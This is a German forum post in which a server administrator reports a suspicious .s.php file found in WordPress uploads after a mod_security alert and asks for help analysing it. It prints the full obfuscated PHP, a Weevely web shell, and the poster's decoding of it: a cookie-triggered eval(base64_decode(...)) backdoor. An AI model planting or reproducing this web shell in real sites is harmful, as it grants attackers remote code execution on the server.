Habe nun rausgefunden woran es lag.
Ich habe es schon ein wenig vermutet.
Ich habe ein paar Tage zuvor Wordpress auf dem Server installiert.
mod_security meldet mir heute:
Weiss noch nicht genau wie die Datei dahin kommt, aber es muss irgendwas mit Wordpress zu tun haben wie es aussieht. Komisch nur, das ich die neuste standard Installation von Wordpress verwende?
Inhalt .s.php
kann das wer Auswerten?
Ich habe sowas raus wie:
Komisch ist jedoch, das ich für wordpress extra eine eigene Tabelle mit eigenem Benutzer erstellt habe.
Der Benutzer wurde aber nicht zum droppen der Tabelle benutzt.
Edit: https://github.com/epinna/Weevely
Ich habe es schon ein wenig vermutet.
Ich habe ein paar Tage zuvor Wordpress auf dem Server installiert.
mod_security meldet mir heute:
[22/Jan/2013:13:08:59 +0100] [***/sid#7f2f1a6f96e0][rid#7f2f1ac7cc50][/wp-content/uploads/2013/01/.s.php][1] Access denied with code 500 (phase 4). Pattern match "(?:\b(??:s(?:elect list because it is not contained in (?:an aggregate function and there is no|either an aggregate function or the) GROUP BY clause|upplied argument is not a valid (??:M(?:S |y)|Postgre)SQL|O(?:racle|DBC)))|S(?:yntax error converti ..." at RESPONSE_BODY. [file "/etc/apache2/ruleset/modsecurity_crs_50_outbound.conf"[line "23"] [id "970003"] [msg "SQL Information Leakage"] [severity "WARNING"] [tag "LEAKAGE/ERRORS"]
Weiss noch nicht genau wie die Datei dahin kommt, aber es muss irgendwas mit Wordpress zu tun haben wie es aussieht. Komisch nur, das ich die neuste standard Installation von Wordpress verwende?
Inhalt .s.php
PHP:
<?php
$vaj="JGM9J2NvdW5lfcj0JzskYT0kXlfcj0NPT0tJRTtpZilfcjhyZXNldCglfcjkYSk9PlfcjSdhcycgJiYgJGMoJGlfcjEpPjlfcjMplfcjelfcj2lfcj";
$xnf="luaV9zZXQoJ2Vycm9yXlfcj2xvZycsICcvZGV2L251bGwnKTslfcjkazlfcj0nZDEyMyc7ZWNobyAlfcjnPCcuJGlfcjsuJz4nO2V2YWwoYm";
$vdv = str_replace("az","","azsaztraz_reazplazaazcaze");
$efy="FzZTYlfcj0X2lfcjRlY29kZShwcmVlfcjnX3JlcGxhY2UoYXJlfcjyYXkoJy9bXlx3PVxzXS8nLCcvXlfcjHlfcjMvJyklfcjsIGFycmF5KC";
$lv="lfcjcnlfcjLCcrJyksIGpvaW4oYXJyYXlfcjlfc2xpY2lfcjUlfcjoJGEsJlfcjGMoJGEpLTMpKlfcjSkpKTtlYlfcj2hvICc8LyculfcjJGsuJz4nO30=";
$tm = $vdv("y", "", "ybaysyey6y4y_dyecyodye");
$ov = $vdv("cg","","cgcrecgacgtcgecg_cgfuncgccgticgocgn");
$wg = $ov('', $tm($vdv("lfcj", "", $vaj.$xnf.$efy.$lv))); $wg();
?>
kann das wer Auswerten?
Ich habe sowas raus wie:
PHP:
createFunction('',
$c='count';
$a=$_COOKIE;
if(reset($a)=='as' && $c($a)>3){
ini_set('error_log', '/dev/null');
$k='d123';
echo '<'.$k.'>';
eval(base64_decode(preg_replace(array('/[^\w=\s]/','/\s/'), array('','+'), join(array_slice($a,$c($a)-3)))));
echo '</'.$k.'>';
}
);
Komisch ist jedoch, das ich für wordpress extra eine eigene Tabelle mit eigenem Benutzer erstellt habe.
Der Benutzer wurde aber nicht zum droppen der Tabelle benutzt.
Edit: https://github.com/epinna/Weevely
Last edited by a moderator: